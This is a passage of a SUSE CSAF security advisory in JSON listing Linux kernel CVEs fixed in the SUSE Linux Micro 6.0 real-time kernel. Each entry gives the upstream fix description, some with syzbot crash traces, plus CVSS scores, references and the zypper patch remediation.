"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40220"
},
{
"cve": "CVE-2025-40223",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40223"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: Fix use-after-free in hdm_disconnect\n\nhdm_disconnect() calls most_deregister_interface(), which eventually\nunregisters the MOST interface device with device_unregister(iface-\u003edev).\nIf that drops the last reference, the device core may call release_mdev()\nimmediately while hdm_disconnect() is still executing.\n\nThe old code also freed several mdev-owned allocations in\nhdm_disconnect() and then performed additional put_device() calls.\nDepending on refcount order, this could lead to use-after-free or\ndouble-free when release_mdev() ran (or when unregister paths also\nperformed puts).\n\nFix by moving the frees of mdev-owned allocations into release_mdev(),\nso they happen exactly once when the device is truly released, and by\ndropping the extra put_device() calls in hdm_disconnect() that are\nredundant after device_unregister() and most_deregister_interface().\n\nThis addresses the KASAN slab-use-after-free reported by syzbot in\nhdm_disconnect(). See report and stack traces in the bug link below.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40223",
"url": "https://www.suse.com/security/cve/CVE-2025-40223"
},
{
"category": "external",
"summary": "SUSE Bug 1254957 for CVE-2025-40223",
"url": "https://bugzilla.suse.com/1254957"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40223"
},
{
"cve": "CVE-2025-40231",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40231"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock: fix lock inversion in vsock_assign_transport()\n\nSyzbot reported a potential lock inversion deadlock between\nvsock_register_mutex and sk_lock-AF_VSOCK when vsock_linger() is called.\n\nThe issue was introduced by commit 687aa0c5581b (\"vsock: Fix\ntransport_* TOCTOU\") which added vsock_register_mutex locking in\nvsock_assign_transport() around the transport-\u003erelease() call, that can\ncall vsock_linger(). vsock_assign_transport() can be called with sk_lock\nheld. vsock_linger() calls sk_wait_event() that temporarily releases and\nre-acquires sk_lock. During this window, if another thread hold\nvsock_register_mutex while trying to acquire sk_lock, a circular\ndependency is created.\n\nFix this by releasing vsock_register_mutex before calling\ntransport-\u003erelease() and vsock_deassign_transport(). This is safe\nbecause we don\u0027t need to hold vsock_register_mutex while releasing the\nold transport, and we ensure the new transport won\u0027t disappear by\nobtaining a module reference first via try_module_get().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40231",
"url": "https://www.suse.com/security/cve/CVE-2025-40231"
},
{
"category": "external",
"summary": "SUSE Bug 1254815 for CVE-2025-40231",
"url": "https://bugzilla.suse.com/1254815"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40231"
},
{
"cve": "CVE-2025-40233",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40233"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: clear extent cache after moving/defragmenting extents\n\nThe extent map cache can become stale when extents are moved or\ndefragmented, causing subsequent operations to see outdated extent flags. \nThis triggers a BUG_ON in ocfs2_refcount_cal_cow_clusters().\n\nThe problem occurs when:\n1. copy_file_range() creates a reflinked extent with OCFS2_EXT_REFCOUNTED\n2. ioctl(FITRIM) triggers ocfs2_move_extents()\n3. __ocfs2_move_extents_range() reads and caches the extent (flags=0x2)\n4. ocfs2_move_extent()/ocfs2_defrag_extent() calls __ocfs2_move_extent()\n which clears OCFS2_EXT_REFCOUNTED flag on disk (flags=0x0)\n5. The extent map cache is not invalidated after the move\n6. Later write() operations read stale cached flags (0x2) but disk has\n updated flags (0x0), causing a mismatch\n7. BUG_ON(!(rec-\u003ee_flags \u0026 OCFS2_EXT_REFCOUNTED)) triggers\n\nFix by clearing the extent map cache after each extent move/defrag\noperation in __ocfs2_move_extents_range(). This ensures subsequent\noperations read fresh extent data from disk.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40233",
"url": "https://www.suse.com/security/cve/CVE-2025-40233"
},
{
"category": "external",
"summary": "SUSE Bug 1254813 for CVE-2025-40233",
"url": "https://bugzilla.suse.com/1254813"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40233"
},
{
"cve": "CVE-2025-40238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix IPsec cleanup over MPV device\n\nWhen we do mlx5e_detach_netdev() we eventually disable blocking events\nnotifier, among those events are IPsec MPV events from IB to core.\n\nSo before disabling those blocking events, make sure to also unregister\nthe devcom device and mark all this device operations as complete,\nin order to prevent the other device from using invalid netdev\nduring future devcom events which could cause the trace below.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000010\nPGD 146427067 P4D 146427067 PUD 146488067 PMD 0\nOops: Oops: 0000 [#1] SMP\nCPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1\nTainted: [W]=WARN\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\nRIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\nCode: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 \u003c48\u003e 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40\nRSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206\nRAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00\nRDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000\nR10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600\nR13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80\nFS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x20/0x60\n ? page_fault_oops+0x150/0x3e0\n ? exc_page_fault+0x74/0x130\n ? asm_exc_page_fault+0x22/0x30\n ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\n mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core]\n mlx5_devcom_send_event+0x8c/0x170 [mlx5_core]\n blocking_event+0x17b/0x230 [mlx5_core]\n notifier_call_chain+0x35/0xa0\n blocking_notifier_call_chain+0x3d/0x60\n mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core]\n mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core]\n mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib]\n mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib]\n ? idr_alloc_cyclic+0x50/0xb0\n ? __kmalloc_cache_noprof+0x167/0x340\n ? __kmalloc_noprof+0x1a7/0x430\n __mlx5_ib_add+0x34/0xd0 [mlx5_ib]\n mlx5r_probe+0xe9/0x310 [mlx5_ib]\n ? kernfs_add_one+0x107/0x150\n ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib]\n auxiliary_bus_probe+0x3e/0x90\n really_probe+0xc5/0x3a0\n ? driver_probe_device+0x90/0x90\n __driver_probe_device+0x80/0x160\n driver_probe_device+0x1e/0x90\n __device_attach_driver+0x7d/0x100\n bus_for_each_drv+0x80/0xd0\n __device_attach+0xbc/0x1f0\n bus_probe_device+0x86/0xa0\n device_add+0x62d/0x830\n __auxiliary_device_add+0x3b/0xa0\n ? auxiliary_device_init+0x41/0x90\n add_adev+0xd1/0x150 [mlx5_core]\n mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core]\n esw_mode_change+0x6c/0xc0 [mlx5_core]\n mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core]\n devlink_nl_eswitch_set_doit+0x60/0xe0\n genl_family_rcv_msg_doit+0xd0/0x120\n genl_rcv_msg+0x180/0x2b0\n ? devlink_get_from_attrs_lock+0x170/0x170\n ? devlink_nl_eswitch_get_doit+0x290/0x290\n ? devlink_nl_pre_doit_port_optional+0x50/0x50\n ? genl_family_rcv_msg_dumpit+0xf0/0xf0\n netlink_rcv_skb+0x54/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x1fc/0x2d0\n netlink_sendmsg+0x1e4/0x410\n __sock_sendmsg+0x38/0x60\n ? sockfd_lookup_light+0x12/0x60\n __sys_sendto+0x105/0x160\n ? __sys_recvmsg+0x4e/0x90\n __x64_sys_sendto+0x20/0x30\n do_syscall_64+0x4c/0x100\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f27bc91b13a\nCode: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40238",
"url": "https://www.suse.com/security/cve/CVE-2025-40238"
},
{
"category": "external",
"summary": "SUSE Bug 1254871 for CVE-2025-40238",
"url": "https://bugzilla.suse.com/1254871"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40238"
},
{
"cve": "CVE-2025-40240",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40240"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: avoid NULL dereference when chunk data buffer is missing\n\nchunk-\u003eskb pointer is dereferenced in the if-block where it\u0027s supposed\nto be NULL only.\n\nchunk-\u003eskb can only be NULL if chunk-\u003ehead_skb is not. Check for frag_list\ninstead and do it just before replacing chunk-\u003eskb. We\u0027re sure that\notherwise chunk-\u003eskb is non-NULL because of outer if() condition.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40240",
"url": "https://www.suse.com/security/cve/CVE-2025-40240"
},
{
"category": "external",
"summary": "SUSE Bug 1254869 for CVE-2025-40240",
"url": "https://bugzilla.suse.com/1254869"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40240"
},
{
"cve": "CVE-2025-40242",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40242"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngfs2: Fix unlikely race in gdlm_put_lock\n\nIn gdlm_put_lock(), there is a small window of time in which the\nDFL_UNMOUNT flag has been set but the lockspace hasn\u0027t been released,\nyet. In that window, dlm may still call gdlm_ast() and gdlm_bast().\nTo prevent it from dereferencing freed glock objects, only free the\nglock if the lockspace has actually been released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40242",
"url": "https://www.suse.com/security/cve/CVE-2025-40242"
},
{
"category": "external",
"summary": "SUSE Bug 1255075 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "external",
"summary": "SUSE Bug 1255076 for CVE-2025-40242",
"url": "https://bugzilla.suse.com/1255076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40242"
},
{
"cve": "CVE-2025-40244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40244"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix KMSAN uninit-value issue in __hfsplus_ext_cache_extent()\n\nThe syzbot reported issue in __hfsplus_ext_cache_extent():\n\n[ 70.194323][ T9350] BUG: KMSAN: uninit-value in __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.195022][ T9350] __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.195530][ T9350] hfsplus_file_extend+0x74f/0x1cf0\n[ 70.195998][ T9350] hfsplus_get_block+0xe16/0x17b0\n[ 70.196458][ T9350] __block_write_begin_int+0x962/0x2ce0\n[ 70.196959][ T9350] cont_write_begin+0x1000/0x1950\n[ 70.197416][ T9350] hfsplus_write_begin+0x85/0x130\n[ 70.197873][ T9350] generic_perform_write+0x3e8/0x1060\n[ 70.198374][ T9350] __generic_file_write_iter+0x215/0x460\n[ 70.198892][ T9350] generic_file_write_iter+0x109/0x5e0\n[ 70.199393][ T9350] vfs_write+0xb0f/0x14e0\n[ 70.199771][ T9350] ksys_write+0x23e/0x490\n[ 70.200149][ T9350] __x64_sys_write+0x97/0xf0\n[ 70.200570][ T9350] x64_sys_call+0x3015/0x3cf0\n[ 70.201065][ T9350] do_syscall_64+0xd9/0x1d0\n[ 70.201506][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.202054][ T9350]\n[ 70.202279][ T9350] Uninit was created at:\n[ 70.202693][ T9350] __kmalloc_noprof+0x621/0xf80\n[ 70.203149][ T9350] hfsplus_find_init+0x8d/0x1d0\n[ 70.203602][ T9350] hfsplus_file_extend+0x6ca/0x1cf0\n[ 70.204087][ T9350] hfsplus_get_block+0xe16/0x17b0\n[ 70.204561][ T9350] __block_write_begin_int+0x962/0x2ce0\n[ 70.205074][ T9350] cont_write_begin+0x1000/0x1950\n[ 70.205547][ T9350] hfsplus_write_begin+0x85/0x130\n[ 70.206017][ T9350] generic_perform_write+0x3e8/0x1060\n[ 70.206519][ T9350] __generic_file_write_iter+0x215/0x460\n[ 70.207042][ T9350] generic_file_write_iter+0x109/0x5e0\n[ 70.207552][ T9350] vfs_write+0xb0f/0x14e0\n[ 70.207961][ T9350] ksys_write+0x23e/0x490\n[ 70.208375][ T9350] __x64_sys_write+0x97/0xf0\n[ 70.208810][ T9350] x64_sys_call+0x3015/0x3cf0\n[ 70.209255][ T9350] do_syscall_64+0xd9/0x1d0\n[ 70.209680][ T9350] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.210230][ T9350]\n[ 70.210454][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Not tainted 6.12.0-rc5 #5\n[ 70.211174][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.212115][ T9350] =====================================================\n[ 70.212734][ T9350] Disabling lock debugging due to kernel taint\n[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic set ...\n[ 70.213858][ T9350] CPU: 2 UID: 0 PID: 9350 Comm: repro Tainted: G B 6.12.0-rc5 #5\n[ 70.214679][ T9350] Tainted: [B]=BAD_PAGE\n[ 70.215057][ T9350] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.215999][ T9350] Call Trace:\n[ 70.216309][ T9350] \u003cTASK\u003e\n[ 70.216585][ T9350] dump_stack_lvl+0x1fd/0x2b0\n[ 70.217025][ T9350] dump_stack+0x1e/0x30\n[ 70.217421][ T9350] panic+0x502/0xca0\n[ 70.217803][ T9350] ? kmsan_get_metadata+0x13e/0x1c0\n\n[ 70.218294][ Message fromT sy9350] kmsan_report+0x296/slogd@syzkaller 0x2aat Aug 18 22:11:058 ...\n kernel\n:[ 70.213284][ T9350] Kernel panic - not syncing: kmsan.panic [ 70.220179][ T9350] ? kmsan_get_metadata+0x13e/0x1c0\nset ...\n[ 70.221254][ T9350] ? __msan_warning+0x96/0x120\n[ 70.222066][ T9350] ? __hfsplus_ext_cache_extent+0x7d0/0x990\n[ 70.223023][ T9350] ? hfsplus_file_extend+0x74f/0x1cf0\n[ 70.224120][ T9350] ? hfsplus_get_block+0xe16/0x17b0\n[ 70.224946][ T9350] ? __block_write_begin_int+0x962/0x2ce0\n[ 70.225756][ T9350] ? cont_write_begin+0x1000/0x1950\n[ 70.226337][ T9350] ? hfsplus_write_begin+0x85/0x130\n[ 70.226852][ T9350] ? generic_perform_write+0x3e8/0x1060\n[ 70.227405][ T9350] ? __generic_file_write_iter+0x215/0x460\n[ 70.227979][ T9350] ? generic_file_write_iter+0x109/0x5e0\n[ 70.228540][ T9350] ? vfs_write+0xb0f/0x14e0\n[ 70.228997][ T9350] ? ksys_write+0x23e/0x490\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40244",
"url": "https://www.suse.com/security/cve/CVE-2025-40244"
},
{
"category": "external",
"summary": "SUSE Bug 1255033 for CVE-2025-40244",
"url": "https://bugzilla.suse.com/1255033"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40244"
},
{
"cve": "CVE-2025-40248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40248"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock: Ignore signal/timeout on connect() if already established\n\nDuring connect(), acting on a signal/timeout by disconnecting an already\nestablished socket leads to several issues:\n\n1. connect() invoking vsock_transport_cancel_pkt() -\u003e\n virtio_transport_purge_skbs() may race with sendmsg() invoking\n virtio_transport_get_credit(). This results in a permanently elevated\n `vvs-\u003ebytes_unsent`. Which, in turn, confuses the SOCK_LINGER handling.\n\n2. connect() resetting a connected socket\u0027s state may race with socket\n being placed in a sockmap. A disconnected socket remaining in a sockmap\n breaks sockmap\u0027s assumptions. And gives rise to WARNs.\n\n3. connect() transitioning SS_CONNECTED -\u003e SS_UNCONNECTED allows for a\n transport change/drop after TCP_ESTABLISHED. Which poses a problem for\n any simultaneous sendmsg() or connect() and may result in a\n use-after-free/null-ptr-deref.\n\nDo not disconnect socket on signal/timeout. Keep the logic for unconnected\nsockets: they don\u0027t linger, can\u0027t be placed in a sockmap, are rejected by\nsendmsg().\n\n[1]: https://lore.kernel.org/netdev/e07fd95c-9a38-4eea-9638-133e38c2ec9b@rbox.co/\n[2]: 